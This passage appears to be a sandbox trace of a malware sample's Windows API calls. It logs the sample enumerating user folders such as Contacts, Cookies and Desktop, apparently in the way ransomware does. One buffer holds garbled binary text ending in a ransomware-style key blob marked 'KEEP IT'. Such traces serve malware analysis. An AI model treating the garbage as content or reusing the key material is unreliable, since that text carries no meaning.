ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.707] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.707] FindNextFileW (in: hFindFile=0x1312fa0, lpFindFileData=0x707bc0 | out: lpFindFileData=0x707bc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0071.707] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.707] lstrlenW (lpString="5p5NrGJn0jS HALPmcxz") returned 20 [0071.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1312620 [0071.708] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70b890 [0071.708] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.708] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.708] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0071.708] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.708] lstrlenW (lpString="AppData") returned 7 [0071.708] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0071.708] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.708] lstrlenW (lpString="Application Data") returned 16 [0071.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1412050 [0071.708] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x708028, ftCreationTime.dwLowDateTime=0x1312168, ftCreationTime.dwHighDateTime=0x413d56cf, ftLastAccessTime.dwLowDateTime=0xf0472774, ftLastAccessTime.dwHighDateTime=0x844ddbf8, ftLastWriteTime.dwLowDateTime=0x8a12e9bc, ftLastWriteTime.dwHighDateTime=0x9f5c8217, nFileSizeHigh=0x3d4e466b, nFileSizeLow=0xe60fee1c, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="謅䪟뺃聈삐ꩪ㬻吀燐㨙朰壅猾ᩄᓼ?髕쌻鶘杢붑赩看悥訛䄋ᗭ閒ꞯ淆螺뵃瑊ⱶ몂ổÊṗ뭳돎䒵揨ዷ詺孢䐍뗨ཪꟗ䔠蹫媿囵ɤᕚ价ꨆᕫ놚᝘鰀酻굩貍䔮丗쉱ꈯ嬄诇샫帗꼍棚ው༯鵤ᚡ⺋Ᏹ錙Ѻ饆専ⶳ琫າ뺷?᱈暐᰷鬅矀蘭嶓敵⮂燔낄ᚻ᭒Ⴊ⼕ⓕﮘ孟?ꝛ쥭䭦◳⼗䛀ﮦ虔鏙胕徊墆豰ö㻘慷쯯뇯?겵棬粝䮗찘쪘䓗?涉\x15᾽﹀䭽돶ꟗ晔菞櫸ꡞ聪?践콺ۈխ₫瀫૲⿻җ붑䝟ﱞ嘒꣮뚂祀?隵曍搯鳽폮䔪⧛쩾ꛄ낃栁ꊭ嬩귿阜⻱㷪싒슞㎫퐪都焟䌎ꞹ듈匈㟭⧃곹?씉챬뿭숑䎜Ԉꊒ䥧ᖤ薿桭趼꠲ࡏ鵜梚쒮䔈࠶鲳㙞??鼽딬磸롁ﻵ災呫㭞Ộ騛䯿᪫嵃遗숋䫗䱚⇟拫쀣ᴳ㷪⺚୘̛?蚡ᮼ䉊?ⱽ껛巚艌썞팣\x01耨pⅨı⫅曽䌨ᗝ킯ଞ጑䊸飔輊㒎곺馱뉽ᒹ賡ꮒꄥऋ䕥ᴬ픎硋৶쑬捅᠋ꔁ⣇⾭䰭饳垟Ṫ苜掂ᤒ梀浣ꤔ㫩樤㢕π修᲍☒岥ᑴ塩ꥍ?꒶ݠ쭗ᵭ㞢驻ⰽӡ睬苋ꅭ땝᠗亙욜煚绉혅⚆뱎뼒윧代䮭贠➕퟽ꐱꄾ밷뗟剔뛋횟ঘ⴬捈䕪鉁ᅔ껲ꦈ嘋壿帝槰佲舭બ钱嵨?켢侞좘
喜ྣ袶䬼됄锱苨짺鄹㸯ꝸ踈篑凉漸ꉳ䨒⹄ර筙概开绥돀൯䥟녛텚팻拪栍侻ꁆ鏤肛ཱི㿴톗㢍쑔堂ࣤ殫昕ꬳᴬḄ칾줎쎈?頋قὓ୴坃뚍諰倉ư疞ᰟ轇렜䒿ꡫ?撝懇醩᧴퉢쁱ꢍ街㘲ᡙྒ䛨쮁娂댫ु๽둷昖⏋挗瓼ㅹ線돳㿜쯃?ꞧ芫䛆?ꭀ࿾뼥骺裳㯍?펕띌ꈹ蓉엊륧碕桕ᡅ憟ᘺ굕谇㱓磸ઁ䤵኎t鵋㒱꧗㗫悔喧ઊ䭳⯆ⵍࢁ틋学滑餯ᆳ듹ᤙꇿᢤ㲥◧녌?뤼菔啿怔嬠鹩?୦ᮼ뺦ㅻ꣈咳즊ꍨᰵ愓屝䷼騞䳽﫠遶?ྗੲ뙏䏱婝ꋗﱮꕶ䈭肊콹锿껳⒈香浵쬣掕▍璗⊿ꞔⴥ옪Ⴀ熇诉疟࿳齦«랜✌휩ⴻ观ྀ䳚ࢶ鏇ԕ蓆毅煍⟔Ʊ?昏ऍ䳍マ繬瘶盄⛷᱾귣Ŋ䝏煞楂ﳗ䔬०뫿広闦Ծퟡ흿Փ臭곺़ꈬ歩?ታ꽩ӃΌ씃攙Ⓓ롾⼩莨䊑風䀀⺏ଽ෱F놭馀ᖯ鬅⪱山ᓓ骯铂?ᓮ탂惁旂帣锕暈꼛ꁋ٪?邰鶫ߥ눸梂ᾯ䐓Ꝟ㶑ᐹ?㥛䳍閳䒘꾇⎀팟쌣墳ﳔ㶄벝ꉏ尣벲옊ίŵ폶̽ꉉ姇썷섩ጪ@ⷍ材﾿ꮀ跐ᶜ룰귌䞜娔홵讁백㿴悾듁頶暲皐魷⩕ʗ䰠駦谐⌧\x9b毯?삵㘫麲ⷰ醊㣟鳅⁜窝윍靷뭁婩艛鍧귫ᩌ踁彥硕絺㺎?缡ꤾᒢ?⮵꾰䧣楌⎒⍘糉皵뤳跒誛ꖼÌॴ莋ꦴ쉊噽ෑ돏ួ侵ꐟ憐각鹺ಫ骑れ⿂䌹冷ˍ뒿⾹駷ꥺ勵舧?훎ᓯ㶥ष͋뉁ꓬ糸ෞ㟲ꩭ뚴銐䀖繿뇾墡沩?츱੥ꞡ寪켇閱藷堋啛䂊⌦舷ၢ덙䮣됷싥叢笟䏯Ꝡ뱂﹄ℇḦ㧺賂画ꎽ攞쌘믺﷋㔙ࡖ넊鬛ⵘ್㾘꧋ܱ녙㦅甭?羲촯?婐샖钐nj哽檜㌨䒖ድ甉Őፌ咺л᭤琰᪉缃䝆搕팊籅ậ쬀䇔ꥷ?鼫ワ隘愱䦚뉢?봄凤ᧃ䴳똴璀䓹횰זⱈ姯䳉댹༛漩ḑ缿䍭ꕚ䭖펙ヺᾜ儀硫ͭ䮭ㅛⴼ俊폊ﲮ᷃黪醭톇疂Fꛐ網扇濠汲鬁䟐﷍艴ㄼ࿊ꣅ䆊秀佬⊹㎪⑥縜ᑯ顣ዚ࿊踽ᲤꝒ☧勉律Ⱦ꽒乚ᒶ媿囌鮮㮌凅ꆚ꟣ﰌՊ鄽徰䲰”퀻ᩝ깑㖙䮭⢍벷퓝㺮睟䨲⋗ཬ쫢?酭둎ﵑ鄺洈﷎쉇ꎱ㩏嬦礼ℯ戦뙾?澊몹揰ꔖ䝠銱∧䶻䒹戝ᕑ藮Ƅ콎⨁鑖ᅿ之帆舠䡋穾꽱?ꙟ峪⎍武⋑컉遢๫ힵ긱歲ྨꋊ嫳朤최㸡ブஇꫣ࢒䠜泝候饋掹찄昔ﰋỾ쇝쬏紑봞?銑屁皼欬槝戆焩둁姠?舾媷˛ဉ僱ꅾ轿?왟愤瑞퓵暡꤯셩躶ḉ뜋勢䚠뢓簋?概黤ⶅᅔ鋪턪㕾퐹￘䓍箝?ጿ蕩떉ǎ䌒ᾋ䵪ᯨꚙ鑷谂?挸匎喬䟘뙻鲸쨝飠槶巟묖ᔷ臱閉ᷔक碕㔈y雳阛걩昂㴧\x9d팀⶙᠖熳唅\xfdd0＀㢌䑏헻睢ꐾ\x93ff⛭ꗬ蓺㓴䖃?㟁䆩ᾘ큩⭿๸ꚃ旮涩䮲ힼ奥⧑(ꇹc©꤀툢\x01HŁⲘıYmfbuguKY3FdeZrheESWthKcCfeolMoOB9zKpH6p82A4EyowIS8XV0\r\nNwQGgK2400+ainvuBXv/H6L6JGFGfeOqYPEPOR+x+8m4sAs6d2aehZi82C569IMg\r\n+oXiTpOOHEB6Rk8q5ORB0KyGvwZir86o6sw9yeueDuK=[end_key]\r\nKEEP IT\r\n", cAlternateFileName="쀣ᴳ㷪⺚୘̛?蚡ᮼ䉊?ⱽ껛巚艌썞팣\x01耨pⅨı⫅曽䌨ᗝ킯ଞ጑䊸飔輊㒎곺馱뉽ᒹ賡ꮒꄥऋ䕥ᴬ픎硋৶쑬捅᠋ꔁ⣇⾭䰭饳垟Ṫ苜掂ᤒ梀浣ꤔ㫩樤㢕π修᲍☒岥ᑴ塩ꥍ?꒶ݠ쭗ᵭ㞢驻ⰽӡ睬苋ꅭ땝᠗亙욜煚绉혅⚆뱎뼒윧代䮭贠➕퟽ꐱꄾ밷뗟剔뛋횟ঘ⴬捈䕪鉁ᅔ껲ꦈ嘋壿帝槰佲舭બ钱嵨?켢侞좘
喜ྣ袶䬼됄锱苨짺鄹㸯ꝸ踈篑凉漸ꉳ䨒⹄ර筙概开绥돀൯䥟녛텚팻拪栍侻ꁆ鏤肛ཱི㿴톗㢍쑔堂ࣤ殫昕ꬳᴬḄ칾줎쎈?頋قὓ୴坃뚍諰倉ư疞ᰟ轇렜䒿ꡫ?撝懇醩᧴퉢쁱ꢍ街㘲ᡙྒ䛨쮁娂댫ु๽둷昖⏋挗瓼ㅹ線돳㿜쯃?ꞧ芫䛆?ꭀ࿾뼥骺裳㯍?펕띌ꈹ蓉엊륧碕桕ᡅ憟ᘺ굕谇㱓磸ઁ䤵኎t鵋㒱꧗㗫悔喧ઊ䭳⯆ⵍࢁ틋学滑餯ᆳ듹ᤙꇿᢤ㲥◧녌?뤼菔啿怔嬠鹩?୦ᮼ뺦ㅻ꣈咳즊ꍨᰵ愓屝䷼騞䳽﫠遶?ྗੲ뙏䏱婝ꋗﱮꕶ䈭肊콹锿껳⒈香浵쬣掕▍璗⊿ꞔⴥ옪Ⴀ熇诉疟࿳齦«랜✌휩ⴻ观ྀ䳚ࢶ鏇ԕ蓆毅煍⟔Ʊ?昏ऍ䳍マ繬瘶盄⛷᱾귣Ŋ䝏煞楂ﳗ䔬०뫿広闦Ծퟡ흿Փ臭곺़ꈬ歩?ታ꽩ӃΌ씃攙Ⓓ롾⼩莨䊑風䀀⺏ଽ෱F놭馀ᖯ鬅⪱山ᓓ骯铂?ᓮ탂惁旂帣锕暈꼛ꁋ٪?邰鶫ߥ눸梂ᾯ䐓Ꝟ㶑ᐹ?㥛䳍閳䒘꾇⎀팟쌣墳ﳔ㶄벝ꉏ尣벲옊ίŵ폶̽ꉉ姇썷섩ጪ@ⷍ材﾿ꮀ跐ᶜ룰귌䞜娔홵讁백㿴悾듁頶暲皐魷⩕ʗ䰠駦谐⌧\x9b毯?삵㘫麲ⷰ醊㣟鳅⁜窝윍靷뭁婩艛鍧귫ᩌ踁彥硕絺㺎?缡ꤾᒢ?⮵꾰䧣楌⎒⍘糉皵뤳跒誛ꖼÌॴ莋ꦴ쉊噽ෑ돏ួ侵ꐟ憐각鹺ಫ骑れ⿂䌹冷ˍ뒿⾹駷ꥺ勵舧?훎ᓯ㶥ष͋뉁ꓬ糸ෞ㟲ꩭ뚴銐䀖繿뇾墡沩?츱੥ꞡ寪켇閱藷堋啛䂊⌦舷ၢ덙䮣됷싥叢笟䏯Ꝡ뱂﹄ℇḦ㧺賂画ꎽ攞쌘믺﷋㔙ࡖ넊鬛ⵘ್㾘꧋ܱ녙㦅甭?羲촯?婐샖钐nj哽檜㌨䒖ድ甉Őፌ咺л᭤琰᪉缃䝆搕팊籅ậ쬀䇔ꥷ?鼫ワ隘愱䦚뉢?봄凤ᧃ䴳똴璀䓹횰זⱈ姯䳉댹༛漩ḑ缿䍭ꕚ䭖펙ヺᾜ儀硫ͭ䮭ㅛⴼ俊폊ﲮ᷃黪醭톇疂Fꛐ網扇濠汲鬁䟐﷍艴ㄼ࿊ꣅ䆊秀佬⊹㎪⑥縜ᑯ顣ዚ࿊踽ᲤꝒ☧勉律Ⱦ꽒乚ᒶ媿囌鮮㮌凅ꆚ꟣ﰌՊ鄽徰䲰”퀻ᩝ깑㖙䮭⢍벷퓝㺮睟䨲⋗ཬ쫢?酭둎ﵑ鄺洈﷎쉇ꎱ㩏嬦礼ℯ戦뙾?澊몹揰ꔖ䝠銱∧䶻䒹戝ᕑ藮Ƅ콎⨁鑖ᅿ之帆舠䡋穾꽱?ꙟ峪⎍武⋑컉遢๫ힵ긱歲ྨꋊ嫳朤최㸡ブஇꫣ࢒䠜泝候饋掹찄昔ﰋỾ쇝쬏紑봞?銑屁皼欬槝戆焩둁姠?舾媷˛ဉ僱ꅾ轿?왟愤瑞퓵暡꤯셩躶ḉ뜋勢䚠뢓簋?概黤ⶅᅔ鋪턪㕾퐹￘䓍箝?ጿ蕩떉ǎ䌒ᾋ䵪ᯨꚙ鑷谂?挸匎喬䟘뙻鲸쨝飠槶巟묖ᔷ臱閉ᷔक碕㔈y雳阛걩昂㴧\x9d팀⶙᠖熳唅\xfdd0＀㢌䑏헻睢ꐾ\x93ff⛭ꗬ蓺㓴䖃?㟁䆩ᾘ큩⭿๸ꚃ旮涩䮲ힼ奥⧑(ꇹc©꤀툢\x01HŁⲘıYmfbuguKY3FdeZrheESWthKcCfeolMoOB9zKpH6p82A4EyowIS8XV0\r\nNwQGgK2400+ainvuBXv/H6L6JGFGfeOqYPEPOR+x+8m4sAs6d2aehZi82C569IMg\r\n+oXiTpOOHEB6Rk8q5ORB0KyGvwZir86o6sw9yeueDuK=[end_key]\r\nKEEP IT\r\n")) returned 0xffffffff [0071.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.708] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0071.708] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.709] lstrlenW (lpString="Contacts") returned 8 [0071.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1412050 [0071.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName=".", cAlternateFileName="")) returned 0x70cf40 [0071.709] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="..", cAlternateFileName="")) returned 1 [0071.709] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.709] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1 [0071.709] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.709] lstrlenW (lpString="Aclviho ASldjfl.contact") returned 23 [0071.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x709030 [0071.709] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0071.709] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.709] lstrlenW (lpString="Administrator.contact") returned 21 [0071.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x709110 [0071.709] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0071.709] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.709] lstrlenW (lpString="asdlfk poopvy.contact") returned 21 [0071.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x14122a8 [0071.710] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0071.710] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.710] lstrlenW (lpString="chucu jadnvk.contact") returned 20 [0071.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x1312168 [0071.710] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0071.710] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.710] lstrlenW (lpString="desktop.ini") returned 11 [0071.710] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0071.710] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.710] lstrlenW (lpString="lulcit amkdfe.contact") returned 21 [0071.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x1412388 [0071.710] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0071.710] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.710] lstrlenW (lpString="sikvnb huvuib.contact") returned 21 [0071.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd2) returned 0x1412468 [0071.711] FindNextFileW (in: hFindFile=0x70cf40, lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0071.711] FindClose (in: hFindFile=0x70cf40 | out: hFindFile=0x70cf40) returned 1 [0071.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.711] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0071.711] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.711] lstrlenW (lpString="Cookies") returned 7 [0071.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1412050 [0071.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x1412548, ftCreationTime.dwLowDateTime=0x70c558, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xf27fe581, dwReserved1=0xa0038c26, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0071.711] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.711] FindNextFileW (in: hFindFile=0x70b890, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb4c25900, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xb4c25900, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0071.711] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.711] lstrlenW (lpString="Desktop") returned 7 [0071.711] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x1412050 [0071.711] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x1412050 | out: lpFindFileData=0x1412050*(dwFileAttributes=0x11, 